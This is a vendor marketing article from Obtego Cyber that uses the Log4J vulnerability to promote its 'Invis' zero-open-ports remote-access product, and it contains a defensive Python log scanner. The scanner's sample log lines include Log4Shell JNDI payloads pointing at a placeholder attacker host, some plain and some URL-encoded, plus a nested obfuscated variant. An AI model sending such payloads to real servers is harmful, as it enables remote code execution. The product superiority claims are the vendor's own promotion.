The Log4J Vulnerability That Didn’t Have to Exist

OBTEGO CYBER 

The Invisible Attack Surface

Bottom Line: Log4J shows us that even more secure approaches are needed to prevent zero-day attacks. For the first time, Obtego Cyber makes your servers completely invisible. Going beyond shrinking an attack surface, which still leaves it vulnerable, our “Invis” technology makes the attack surface completely invisible with zero open ports and no login pages. Attackers can’t find what they can’t see.

Internet-facing login pages are public-facing portals where users can log in to access their accounts on servers. From an attacker’s perspective, the login functionality is the primary barrier to gaining an initial foothold; however, there are common vulnerabilities or misconfigurations in login functionality that an attacker can exploit. Some of these vulnerabilities are Default Credentials, User Enumeration, Brute-Force, Cross-Site Scripting, SQL/NoSQL/LDAP/XML Injection, Path Traversal, SYN Flood, SSL/TLS Exhaustion, and more.

Using the newly discovered Log4J vulnerability, an attacker can execute arbitrary code on the server by submitting a specially crafted request. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. Log4J is already being called the single largest, most critical vulnerability of the last decade.
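The lookup substitution described above leaves a recognizable trace in request logs. The following is an added example, not Obtego Cyber's code: a small scanner that decodes URL-encoding and flags JNDI lookup expressions in log lines. The sample lines, addresses and host names are constructed placeholders.

```python
import re
from urllib.parse import unquote

# Lookup expression asking Log4J to resolve a name via JNDI, e.g. over LDAP.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)\s*:", re.IGNORECASE)
# A lookup nested inside another lookup: a flat regex cannot judge it, so flag it for review.
NESTED_LOOKUP = re.compile(r"\$\{[^{}]*\$\{")

def normalize(line, max_rounds=3):
    """Undo up to max_rounds layers of URL-encoding so an encoded '${' becomes visible."""
    for _ in range(max_rounds):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    return line

def classify(line):
    """Return ('jndi', scheme), ('nested', None) or ('clean', None) for one log line."""
    text = normalize(line)
    match = JNDI_LOOKUP.search(text)
    if match:
        return ("jndi", match.group(1).lower())
    if NESTED_LOOKUP.search(text):
        return ("nested", None)
    return ("clean", None)

def scan(lines):
    """Yield (line_number, verdict, scheme) for every line that is not clean."""
    for number, line in enumerate(lines, 1):
        verdict, scheme = classify(line)
        if verdict != "clean":
            yield (number, verdict, scheme)

# Constructed access-log lines (not real traffic); hosts are placeholders.
SAMPLE_LOG = [
    '203.0.113.5 - - "GET /login HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '203.0.113.9 - - "GET /?q=%24%7BJNDI%3Aldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 404 "-"',
    '203.0.113.7 - - "GET /?q=%2524%257Bjndi%253Aldap%253A%252F%252Fattacker.example%257D HTTP/1.1" 404 "-"',
    '198.51.100.2 - - "GET / HTTP/1.1" 200 "${${env:X}:y}"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit means a lookup string reached the log, not that it was resolved; nested expressions are reported for manual review rather than evaluated.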

To exploit the Log4J vulnerability, an attacker must first find the vulnerable server itself. But what if attackers couldn’t see the server in the first place? The logic is straightforward: if attackers cannot see the servers, they cannot find them, so they cannot attack them. Many security solutions provide secure remote access. However, they all have a login page or various open ports. Therefore, they will continue to be vulnerable to new zero-day vulnerabilities or any misconfigurations sooner or later.

On the other hand, Invis, the new solution from Obtego Cyber, is the only solution that can make the attack surface invisible. Invis is remote access software that provides policy-based secure access to internal applications. Its gateway can be implemented in the cloud or at the perimeter. Authentication occurs without a login page. Deployments by early adopters such as MSPs have shown that there are zero open ports on the Invis gateway. Only authorized users can see the login page of servers. Assume there are vulnerabilities or misconfigurations on the server apps; what can attackers do when they do not have access to the servers and cannot see them? Invis can stop attackers at the reconnaissance stage as the only solution making the attack surface invisible instead of just shrinking it.

Invis Means Zero Open Ports

Invis has additional capabilities, such as preventing malware lateral movement from remote devices to enterprise networks via Dynamic Micro-Segmentation. This is in addition to its ability to make servers completely invisible with zero open ports. Using this technology, authorized remote users can access only a single app on a single server.

We also understand that the daily operations of a business cannot be slowed. Invis provides these advanced security features without sacrificing network performance compared to other secure remote access solutions. It deploys quickly and easily (really), requiring no modifications on the enterprise network firewall or port forwarding on routers.

Log4J shows that shrinking the attack surface is not enough to prevent catastrophic attacks. Nor does shifting the attack surface from one point of vulnerability to another enhance your fundamental security. It is time to alter the terms of engagement by making the attack surface invisible so attackers can’t see your server in the first place. We look forward to sharing more with you soon.

 

Dr. Vahid Heydari 

CTO 

Obtego Cyber 

Vahid@obtegocyber.com